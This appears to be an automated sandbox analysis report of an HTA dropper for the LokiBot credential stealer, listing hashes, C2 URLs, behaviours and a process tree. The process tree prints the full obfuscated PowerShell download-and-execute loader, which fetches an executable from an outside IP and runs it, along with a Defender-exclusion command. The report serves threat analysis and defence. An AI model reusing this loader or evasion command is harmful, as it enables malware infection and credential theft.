Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 10:02

General

  • Target

    goodtoseeuthatgreatthingswithentirethingsgreatfor.hta

  • Size

    23KB

  • MD5

    ec0d423a3f72d69975a1e31a275f5377

  • SHA1

    213922fb8456ecaadc24889afec1ac6ef5010c68

  • SHA256

    9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac

  • SHA512

    8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

  • SSDEEP

    96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodtoseeuthatgreatthingswithentirethingsgreatfor.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
      "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2524
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7hpqmqwi.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CE7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6CE6.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:480
      • C:\Users\Admin\AppData\Roaming\wininit.exe
        "C:\Users\Admin\AppData\Roaming\wininit.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2400
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:524
        • C:\Users\Admin\AppData\Roaming\wininit.exe
          "C:\Users\Admin\AppData\Roaming\wininit.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7hpqmqwi.dll

    Filesize

    3KB

    MD5

    ac0c76976f611a5eb28b4144220760e2

    SHA1

    56297103ab3d7dd9fba971386d9c8e8f668fa9d4

    SHA256

    8aed68b50e3c8000145128d18487a5499c3de0067ff473229111a446b643c9d8

    SHA512

    df29f9413754240e97fe06c8c1f43edb127a29362729a7bb4786f167ae63a3dffdcfa1fee805811ed046f53309de2c496fb96e96c266d7ad3e73fc96e25af736

  • C:\Users\Admin\AppData\Local\Temp\7hpqmqwi.pdb

    Filesize

    7KB

    MD5

    961d4fdd26dc4e680738efa0ed89d35d

    SHA1

    129d99e2959337327caa177a1a04788675437b49

    SHA256

    ad58fab8b3c3dba26b93e77e3bd8a825cc4101125e8d0158a55d4df6314544c8

    SHA512

    004fa5f3d29c6e42e5f373c9314526a26b3871479aa3c189b63ccd86631ba231d37c0c33dc60dea87a8740792501b8a7f98d6eac3bab81d974d040498ec12c97

  • C:\Users\Admin\AppData\Local\Temp\RES6CE7.tmp

    Filesize

    1KB

    MD5

    432145e755635f0f7dd4e9d9c001eee1

    SHA1

    75424ccdd5f19346dc5409bd3185603fe3875415

    SHA256

    7ba13c1156b68ee9ae337035fcc7dbb5c776ecf2aa1f2259ef86ea1f716e1930

    SHA512

    5a4e27e5e6d399399db7bccbc527b20e2c9b178ce5e58987bac42b03d3a5b7e4b1b472e46f2fced678e665f26a5b9a22a4df80cc6da59dba903864a10b8b9cd8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    1b2c4d0a6025db42f9b466db48e5fc21

    SHA1

    4e94dd721efbcbcd92ad8ac0df07a9e076d28bfc

    SHA256

    0d40700c13de59ab4480396c0f5ee4562779323b3d58429af319f94b10c875a2

    SHA512

    e2bf21ead5b4ef6ddc1a530786e84f4cd541adb470b4483b15d9cd3c7a970ae356f9be232625894be982b9372778b020245897334425b0f044061857ea15712e

  • C:\Users\Admin\AppData\Roaming\wininit.exe

    Filesize

    586KB

    MD5

    66b03d1aff27d81e62b53fc108806211

    SHA1

    2557ec8b32d0b42cac9cabde199d31c5d4e40041

    SHA256

    59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4

    SHA512

    9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

  • \??\c:\Users\Admin\AppData\Local\Temp\7hpqmqwi.0.cs

    Filesize

    480B

    MD5

    b0517586f4097114e790c61f2685f0d5

    SHA1

    20f7482298ab96731228ebd5242ceddfd72ff50f

    SHA256

    a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237

    SHA512

    c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

  • \??\c:\Users\Admin\AppData\Local\Temp\7hpqmqwi.cmdline

    Filesize

    309B

    MD5

    7b8afc6503dc17dfe8b61f66774b6e72

    SHA1

    c4cf39ff6e133099c54df3513190bcf8c9c5a6c2

    SHA256

    218148fff338066326231a7bb577732d9ed7512a9d75660eb35a9bb37cddea69

    SHA512

    559611bbcd556d3a8fbd6c73ef082ff018170a4cc477d25fe5e4e6b9a36303c87ea54a04b2691880d62b52e911b5e2d552274d273dc4820962f0956c874ad969

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC6CE6.tmp

    Filesize

    652B

    MD5

    18b768dd5925fe340f13409d5e066136

    SHA1

    460cea768f1aa995312ca4d523724fdbe5e0b5b0

    SHA256

    984e926b06ff84a34be9cf6793820fc04f8bda647bc62b37e0818769fce66698

    SHA512

    c24ff59cd84d11f22bff202700c33a095401a403b58ec2a2f1c9cd39a7231a5c221e4f18ebdb09bfe348c65e1f43ff1ebfd744035aa63d6499d7744771d57e33

  • memory/2400-37-0x0000000002170000-0x00000000021D4000-memory.dmp

    Filesize

    400KB

  • memory/2400-36-0x00000000004B0000-0x00000000004C2000-memory.dmp

    Filesize

    72KB

  • memory/2400-35-0x0000000000C00000-0x0000000000C98000-memory.dmp

    Filesize

    608KB

  • memory/2416-40-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-51-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-49-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2416-46-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-44-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-42-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-38-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-75-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2416-84-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB